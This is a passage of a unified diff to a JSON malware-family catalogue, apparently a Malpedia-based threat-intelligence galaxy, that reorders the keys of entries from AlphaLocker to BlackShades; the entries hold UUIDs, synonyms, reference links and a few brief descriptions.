Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." + "value": "AlphaLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", - "value": "AlphaNC", - "description": "" + "value": "AlphaNC" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", - "value": "Alreay", - "description": "" + "value": "Alreay" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" + ], "synonyms": [ "Olmarik", "Pihar", "TDSS", "TDL" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" - ] + "type": [] }, "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", - "value": "Alureon", - "description": "" + "value": "Alureon" }, { + "description": "", "meta": { - "synonyms": [ - "Adupihan" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" - ] + ], + "synonyms": [ + "Adupihan" + ], + "type": [] }, "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", - "value": "AMTsol", - "description": "" + "value": "AMTsol" }, { + "description": "", "meta": { - "synonyms": [ - "Gamarue", - "B106-Gamarue", - "B67-SS-Gamarue", - "b66" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", "http://blog.morphisec.com/andromeda-tactics-analyzed", @@ -3125,354 +3122,356 @@ "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" - ] + ], + "synonyms": [ + "Gamarue", + "B106-Gamarue", + "B67-SS-Gamarue", + "b66" + ], + "type": [] }, "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", - "value": "Andromeda", - "description": "" + "value": "Andromeda" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", - "value": "Anel", - "description": "" + "value": "Anel" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" + ], "synonyms": [ "Latinus" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" - ] + "type": [] }, "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", - "value": "Antilam", - "description": "" + "value": "Antilam" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d3e16d46-e436-4757-b962-6fd393056415", - "value": "Apocalipto", - "description": "" + "value": "Apocalipto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", - "value": "Apocalypse", - "description": "" + "value": "Apocalypse" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", - "value": "ArdaMax", - "description": "" + "value": "ArdaMax" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", - "value": "Arefty", - "description": "" + "value": "Arefty" }, { + "description": "", "meta": { - "synonyms": [ - "Aaron Keylogger" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", "http://remote-keylogger.net/" - ] + ], + "synonyms": [ + "Aaron Keylogger" + ], + "type": [] }, "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", - "value": "Arik Keylogger", - "description": "" + "value": "Arik Keylogger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", "https://twitter.com/Racco42/status/1001374490339790849", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", - "value": "ARS VBS Loader", - "description": "" + "value": "ARS VBS Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", - "value": "AscentLoader", - "description": "" + "value": "AscentLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", - "value": "ASPC", - "description": "" + "value": "ASPC" }, { + "description": "", "meta": { - "synonyms": [ - "Aseljo", - "BadSrc" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" - ] + ], + "synonyms": [ + "Aseljo", + "BadSrc" + ], + "type": [] }, "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", - "value": "Asprox", - "description": "" + "value": "Asprox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", "http://blog.talosintel.com/2017/02/athena-go.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", - "value": "AthenaGo RAT", - "description": "" + "value": "AthenaGo RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", - "value": "ATI-Agent", - "description": "" + "value": "ATI-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", - "value": "ATMii", - "description": "" + "value": "ATMii" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", - "value": "ATMitch", - "description": "" + "value": "ATMitch" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", "https://www.group-ib.com/resources/threat-research/silence.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", - "value": "Atmosphere", - "description": "" + "value": "Atmosphere" }, { + "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", - "value": "ATMSpitter", - "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." + "value": "ATMSpitter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", - "value": "August Stealer", - "description": "" + "value": "August Stealer" }, { + "description": "", "meta": { - "synonyms": [ - "Riodrv" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [ + "Riodrv" + ], + "type": [] }, "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", - "value": "Auriga", - "description": "" + "value": "Auriga" }, { + "description": "Ransomware", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", - "value": "Aurora", - "description": "Ransomware" + "value": "Aurora" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", - "value": "AvastDisabler", - "description": "" + "value": "AvastDisabler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", - "value": "AVCrypt", - "description": "" + "value": "AVCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", - "value": "Aveo", - "description": "" + "value": "Aveo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", - "value": "Avzhan", - "description": "" + "value": "Avzhan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", - "value": "Ayegent", - "description": "" + "value": "Ayegent" }, { + "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", "meta": { - "synonyms": [ - "PuffStealer", - "Rultazo" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", @@ -3482,18 +3481,19 @@ "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] + ], + "synonyms": [ + "PuffStealer", + "Rultazo" + ], + "type": [] }, "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", - "value": "Azorult", - "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." + "value": "Azorult" }, { + "description": "", "meta": { - "synonyms": [ - "SNOWBALL" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", @@ -3501,84 +3501,86 @@ "http://www.spiegel.de/media/media-35683.pdf", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" - ] + ], + "synonyms": [ + "SNOWBALL" + ], + "type": [] }, "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", - "value": "Babar", - "description": "" + "value": "Babar" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", - "value": "BABYMETAL", - "description": "" + "value": "BABYMETAL" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", - "value": "backspace", - "description": "" + "value": "backspace" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", "https://www.cert.pl/en/news/single/backswap-malware-analysis/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", - "value": "BackSwap", - "description": "" + "value": "BackSwap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", "https://twitter.com/PhysicalDrive0/status/833067081981710336" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af1c99be-e55a-473e-abed-726191e1da05", - "value": "BadEncript", - "description": "" + "value": "BadEncript" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", - "value": "badflick", - "description": "" + "value": "badflick" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", @@ -3586,192 +3588,190 @@ "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", - "value": "BadNews", - "description": "" + "value": "BadNews" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", - "value": "Bagle", - "description": "" + "value": "Bagle" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "" + "value": "Bahamut" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", - "value": "Banatrix", - "description": "" + "value": "Banatrix" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", - "value": "bangat", - "description": "" + "value": "bangat" }, { + "description": "", "meta": { - "synonyms": [ - "MultiBanker 2", - "BankPatch", - "BackPatcher" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", "http://blog.kleissner.org/?p=69", "http://osint.bambenekconsulting.com/feeds/", "http://blog.kleissner.org/?p=192", "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" - ] + ], + "synonyms": [ + "MultiBanker 2", + "BankPatch", + "BackPatcher" + ], + "type": [] }, "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", - "value": "Banjori", - "description": "" + "value": "Banjori" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", - "value": "Bankshot", - "description": "" + "value": "Bankshot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", - "value": "Bart", - "description": "" + "value": "Bart" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", - "value": "BatchWiper", - "description": "" + "value": "BatchWiper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", - "value": "Batel", - "description": "" + "value": "Batel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", - "value": "BBSRAT", - "description": "" + "value": "BBSRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", - "value": "Bedep", - "description": "" + "value": "Bedep" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", - "value": "beendoor", - "description": "" + "value": "beendoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", - "value": "BernhardPOS", - "description": "" + "value": "BernhardPOS" }, { + "description": "", "meta": { - "synonyms": [ - "Neurevt" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", @@ -3781,546 +3781,548 @@ "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" - ] + ], + "synonyms": [ + "Neurevt" + ], + "type": [] }, "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", - "value": "BetaBot", - "description": "" + "value": "BetaBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", - "value": "BfBot", - "description": "" + "value": "BfBot" }, { + "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", "https://habrahabr.ru/post/213973/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", - "value": "BillGates", - "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." + "value": "BillGates" }, { + "description": "", "meta": { - "synonyms": [ - "zxdosml" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [ + "zxdosml" + ], + "type": [] }, "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", - "value": "Biscuit", - "description": "" + "value": "Biscuit" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", - "value": "Bitsran", - "description": "" + "value": "Bitsran" }, { + "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { - "synonyms": [ - "bwin3_bka" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", "https://www.evild3ad.com/405/bka-trojaner-ransomware/" - ] + ], + "synonyms": [ + "bwin3_bka" + ], + "type": [] }, "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", - "value": "BKA Trojaner", - "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language." + "value": "BKA Trojaner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", - "value": "BlackEnergy", - "description": "" + "value": "BlackEnergy" }, { + "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" + ], "synonyms": [ "POSWDS", "Reedum", "Kaptoxa" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" - ] + "type": [] }, "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", - "value": "BlackPOS", - "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. " + "value": "BlackPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", - "value": "BlackRevolution", - "description": "" + "value": "BlackRevolution" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", 